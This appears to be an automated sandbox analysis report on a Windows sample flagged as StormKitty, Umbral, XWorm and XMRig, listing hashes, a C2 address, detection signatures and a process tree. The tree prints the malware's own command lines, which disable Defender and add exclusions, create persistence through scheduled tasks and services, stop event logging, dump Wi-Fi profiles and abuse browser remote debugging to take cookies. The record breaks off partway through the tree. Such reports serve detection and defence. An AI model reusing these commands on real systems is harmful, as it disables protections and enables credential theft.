stormkitty | c7f5161e69a1f7de4f87d1eaa680f045e84869d888c9c68c1ffc4ec6d1a95207

Analysis

max time kernel
1s
max time network
160s
platform
windows11-21h2_x64
resource
win11-20250410-en
resource tags

arch:x64arch:x86image:win11-20250410-enlocale:en-usos:windows11-21h2-x64system
submitted
20/04/2025, 08:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SecuriteInfo.com.Trojan.Siggen31.9411.1178.4099.exe
Size

7.8MB
MD5

a5d2cfff273ff2896651620edbfbf2ff
SHA1

eedcc55e4d6132e933b83e78ec0f6b27920706f7
SHA256

c7f5161e69a1f7de4f87d1eaa680f045e84869d888c9c68c1ffc4ec6d1a95207
SHA512

6cf7a9448914ecf029d9a02c7d084f1f44c08d54fe2ae8f59198544ef22a11f7a8aa1f403f1d3d33cc363bc8cbe43f50177c6dfd4b3cdfdd55086738961e0464
SSDEEP

98304:fyfoRvySuOauKO0dc9MxBhceGJ8U3IpaGmTU:aAh+cu3hceq8U3OaGs

Score

10^/10

stormkitty umbral xmrig xworm credential_access defense_evasion discovery execution miner persistence rat stealer trojan upx

Malware Config

Extracted

Family

xworm

89.39.121.169:9000

Attributes

Install_directory
%AppData%
install_file
XClient.exe

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral2/files/0x001900000002b332-1063.dat	family_umbral
behavioral2/memory/5812-1073-0x0000022C7A7B0000-0x0000022C7A7F0000-memory.dmp	family_umbral

Detect Xworm Payload 4 IoCs

resource	yara_rule
behavioral2/memory/1416-44-0x00000000006C0000-0x00000000006D8000-memory.dmp	family_xworm
behavioral2/files/0x001900000002b243-42.dat	family_xworm
behavioral2/files/0x001900000002b331-433.dat	family_xworm
behavioral2/memory/5816-448-0x00000000007B0000-0x00000000007C8000-memory.dmp	family_xworm

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 5 IoCs

resource	yara_rule
behavioral2/memory/4192-1-0x00000000005F0000-0x0000000000DC4000-memory.dmp	family_stormkitty
behavioral2/files/0x001900000002b23c-67.dat	family_stormkitty
behavioral2/files/0x001900000002b23c-93.dat	family_stormkitty
behavioral2/memory/4324-94-0x0000000000800000-0x0000000000FD4000-memory.dmp	family_stormkitty
behavioral2/files/0x001900000002b23c-92.dat	family_stormkitty

Stormkitty family
stormkitty
Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Umbral family
umbral
Xmrig family
xmrig
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Xworm family
xworm
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 2 IoCs

miner

resource	yara_rule
behavioral2/memory/2572-1841-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig
behavioral2/memory/2572-1842-0x0000000140000000-0x0000000140848000-memory.dmp	xmrig

Command and Scripting Interpreter: PowerShell 1 TTPs 20 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1600	powershell.exe
4428	powershell.exe
1524	powershell.exe
3748	powershell.exe
4316	powershell.exe
4492	powershell.exe
4688	powershell.exe
1852	powershell.exe
5660	powershell.exe
2388	powershell.exe
3988	powershell.exe
1056	powershell.exe
3804	powershell.exe
1268	powershell.exe
5184	powershell.exe
2400	powershell.exe
2196	powershell.exe
2568	powershell.exe
6088	powershell.exe
3572	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002
Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 20 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
3948	msedge.exe
4616	chrome.exe
2920	chrome.exe
4720	chrome.exe
452	chrome.exe
5756	chrome.exe
6136	chrome.exe
5412	msedge.exe
5908	msedge.exe
252	msedge.exe
1992	chrome.exe
2480	chrome.exe
2576	msedge.exe
4612	msedge.exe
5500	msedge.exe
692	chrome.exe
5592	chrome.exe
5252	msedge.exe
4380	msedge.exe
2200	chrome.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
1	raw.githubusercontent.com
3	raw.githubusercontent.com

Power Settings 1 TTPs 24 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
2484	powercfg.exe
1760	powercfg.exe
4596	powercfg.exe
3400	powercfg.exe
1232	powercfg.exe
3188	powercfg.exe
2608	powercfg.exe
4748	powercfg.exe
1228	powercfg.exe
5516	powercfg.exe
4072	powercfg.exe
5116	powercfg.exe
3116	powercfg.exe
2892	powercfg.exe
3132	powercfg.exe
1512	powercfg.exe
572	powercfg.exe
3112	powercfg.exe
3748	powercfg.exe
3960	powercfg.exe
6032	powercfg.exe
3000	powercfg.exe
3136	powercfg.exe
3992	powercfg.exe

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2572-1020-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1024-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1026-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1031-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1030-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1033-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1032-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1029-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1025-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1023-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1022-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1019-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1841-0x0000000140000000-0x0000000140848000-memory.dmp	upx
behavioral2/memory/2572-1842-0x0000000140000000-0x0000000140848000-memory.dmp	upx

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2364	sc.exe
5936	sc.exe
2620	sc.exe
3156	sc.exe
2200	sc.exe
4872	sc.exe
5012	sc.exe
1444	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SecuriteInfo.com.Trojan.Siggen31.9411.1178.4099.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
4344	PING.EXE

System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 6 IoCs

Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

discovery

Wi-Fi Discovery

T1016.002

pid	Process
1600	cmd.exe
3424	netsh.exe
468	cmd.exe
5304	netsh.exe
3764	cmd.exe
2668	netsh.exe

Detects videocard installed 1 TTPs 2 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
5584	wmic.exe
3540	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
4344	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1772	schtasks.exe
4496	schtasks.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	4192	SecuriteInfo.com.Trojan.Siggen31.9411.1178.4099.exe

C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen31.9411.1178.4099.exe
"C:\Users\Admin\AppData\Local\Temp\SecuriteInfo.com.Trojan.Siggen31.9411.1178.4099.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:4192
- C:\Users\Admin\AppData\Local\Temp\svchost.exe
  "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
  2⤵
  PID:5704
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\RuntimeBroker\16dCsj2KS342E9po.vbe"
    3⤵
    PID:5808
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\RuntimeBroker\h6MZtlz9b6ld7hEL8xRAUEYhnCmEpZ0.bat" "
      4⤵
      PID:2244
- - C:\RuntimeBroker\1.exe
    "C:\RuntimeBroker\1.exe"
    3⤵
    PID:1416
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\RuntimeBroker\1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:6088
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess '1.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2568
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:3572
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:2388
  - - C:\Windows\System32\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\Admin\AppData\Roaming\XClient.exe"
      4⤵
      Scheduled Task/Job: Scheduled Task
      PID:1772
  - - C:\Users\Admin\AppData\Local\Temp\xaehly.exe
      "C:\Users\Admin\AppData\Local\Temp\xaehly.exe"
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\RuntimeBroker\16dCsj2KS342E9po.vbe"
        5⤵
        
        PID:1656
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\RuntimeBroker\h6MZtlz9b6ld7hEL8xRAUEYhnCmEpZ0.bat" "
        6⤵
        
        PID:1436
        
        C:\RuntimeBroker\Portfont.exe
        
        "C:\RuntimeBroker/Portfont.exe"
        7⤵
        
        PID:5976
  - - C:\Users\Admin\AppData\Local\Temp\xgzxai.exe
      "C:\Users\Admin\AppData\Local\Temp\xgzxai.exe"
      4⤵
      PID:1712
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2400
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5400
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:3368
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        Power Settings
        
        PID:3960
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        Power Settings
        
        PID:2608
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        Power Settings
        
        PID:3132
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        Power Settings
        
        PID:3188
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:2620
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "TGENUFOC"
        5⤵
        Launches sc.exe
        
        PID:5936
  - - C:\Users\Admin\AppData\Local\Temp\bmtjau.exe
      "C:\Users\Admin\AppData\Local\Temp\bmtjau.exe"
      4⤵
      PID:5364
    - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
        
        "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
        5⤵
        
        PID:988
      - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\driverPerf\4xcfk9mAawKD1wz7D2tyIbsU3PDZlXcDabYceiRpbfpMPoX.vbe"
        6⤵
        
        PID:3232
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\driverPerf\utbCPO.bat" "
        7⤵
        
        PID:5228
        
        C:\driverPerf\SavesRuntimecommon.exe
        
        "C:\driverPerf/SavesRuntimecommon.exe"
        8⤵
        
        PID:2500
      - C:\driverPerf\XClient.exe
        
        "C:\driverPerf\XClient.exe"
        6⤵
        
        PID:4504
      - C:\driverPerf\Umbral.exe
        
        "C:\driverPerf\Umbral.exe"
        6⤵
        
        PID:3584
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:3440
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\driverPerf\Umbral.exe'
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1600
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" os get Caption
        7⤵
        
        PID:3996
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" computersystem get totalphysicalmemory
        7⤵
        
        PID:2920
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic.exe" csproduct get uuid
        7⤵
        
        PID:2804
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4428
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" path win32_VideoController get name
        7⤵
        Detects videocard installed
        
        PID:3540
      - C:\driverPerf\123.exe
        
        "C:\driverPerf\123.exe"
        6⤵
        
        PID:1800
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9222 --remote-allow-origins=* --headless --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data"
        5⤵
        Uses browser remote debugging
        
        PID:252
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x240,0x244,0x248,0x23c,0x2f4,0x7ffd8c6ef208,0x7ffd8c6ef214,0x7ffd8c6ef220
        6⤵
        
        PID:4688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2916,i,4168105609465974902,6956064817649599988,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2912 /prefetch:11
        6⤵
        
        PID:5688
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2116,i,4168105609465974902,6956064817649599988,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2108 /prefetch:2
        6⤵
        
        PID:3652
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2932,i,4168105609465974902,6956064817649599988,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2924 /prefetch:13
        6⤵
        
        PID:3628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3508,i,4168105609465974902,6956064817649599988,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3504 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4380
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3524,i,4168105609465974902,6956064817649599988,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3512 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:5252
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
        5⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:1600
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1780
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show profile
        6⤵
        System Network Configuration Discovery: Wi-Fi Discovery
        
        PID:3424
      - C:\Windows\SysWOW64\findstr.exe
        
        findstr All
        6⤵
        
        PID:4400
    - - C:\Windows\SysWOW64\cmd.exe
        
        "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
        5⤵
        
        PID:5308
      - C:\Windows\SysWOW64\chcp.com
        
        chcp 65001
        6⤵
        
        PID:4996
      - C:\Windows\SysWOW64\netsh.exe
        
        netsh wlan show networks mode=bssid
        6⤵
        
        PID:3436
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:5756
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd61addcf8,0x7ffd61addd04,0x7ffd61addd10
        6⤵
        
        PID:5068
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2496,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2492 /prefetch:2
        6⤵
        
        PID:5188
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1700,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2508 /prefetch:11
        6⤵
        
        PID:4440
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2044,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=2488 /prefetch:13
        6⤵
        
        PID:5468
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3280,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3352 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1992
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3288,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=3372 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2200
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4412,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4432 /prefetch:9
        6⤵
        Uses browser remote debugging
        
        PID:6136
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4764,i,8995842224674094357,12916448614304887209,262144 --variations-seed-version=20250410-050051.531000 --mojo-platform-channel-handle=4752 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:692
- - C:\RuntimeBroker\2.exe
    "C:\RuntimeBroker\2.exe"
    3⤵
    PID:5184
  - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      PID:4492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
      4⤵
      PID:2428
    - - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:5880
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
      4⤵
      Power Settings
      PID:1760
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
      4⤵
      Power Settings
      PID:6032
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
      4⤵
      Power Settings
      PID:4072
  - - C:\Windows\system32\powercfg.exe
      C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
      4⤵
      Power Settings
      PID:5516
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe delete "TGENUFOC"
      4⤵
      Launches sc.exe
      PID:3156
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe create "TGENUFOC" binpath= "C:\ProgramData\umudhokrleen\tfbrzzhhrzhb.exe" start= "auto"
      4⤵
      Launches sc.exe
      PID:2200
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe stop eventlog
      4⤵
      Launches sc.exe
      PID:5012
  - - C:\Windows\system32\sc.exe
      C:\Windows\system32\sc.exe start "TGENUFOC"
      4⤵
      Launches sc.exe
      PID:4872
- - C:\RuntimeBroker\3.exe
    "C:\RuntimeBroker\3.exe"
    3⤵
    PID:3216
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\lyvpm7YyGf.bat"
      4⤵
      PID:5416
    - - C:\Windows\system32\chcp.com
        
        chcp 65001
        5⤵
        
        PID:1500
    - - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        5⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4344
    - - C:\30f085101a08188d58\msedge.exe
        
        "C:\30f085101a08188d58\msedge.exe"
        5⤵
        
        PID:4624
- - C:\RuntimeBroker\4.exe
    "C:\RuntimeBroker\4.exe"
    3⤵
    PID:4324
  - - C:\Users\Admin\AppData\Local\Temp\svchost.exe
      "C:\Users\Admin\AppData\Local\Temp\svchost.exe"
      4⤵
      PID:1076
    - - C:\Windows\SysWOW64\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\driverPerf\4xcfk9mAawKD1wz7D2tyIbsU3PDZlXcDabYceiRpbfpMPoX.vbe"
        5⤵
        
        PID:5364
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\driverPerf\utbCPO.bat" "
        6⤵
        
        PID:1892
        
        C:\driverPerf\SavesRuntimecommon.exe
        
        "C:\driverPerf/SavesRuntimecommon.exe"
        7⤵
        
        PID:5488
        
        C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\6Fpa9eeLAz.bat"
        8⤵
        
        PID:5060
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        9⤵
        
        PID:2988
        
        C:\Windows\system32\w32tm.exe
        
        w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
        9⤵
        
        PID:2188
        
        C:\driverPerf\smss.exe
        
        "C:\driverPerf\smss.exe"
        9⤵
        
        PID:5836
    - - C:\driverPerf\XClient.exe
        
        "C:\driverPerf\XClient.exe"
        5⤵
        
        PID:5816
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\driverPerf\XClient.exe'
        6⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3804
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
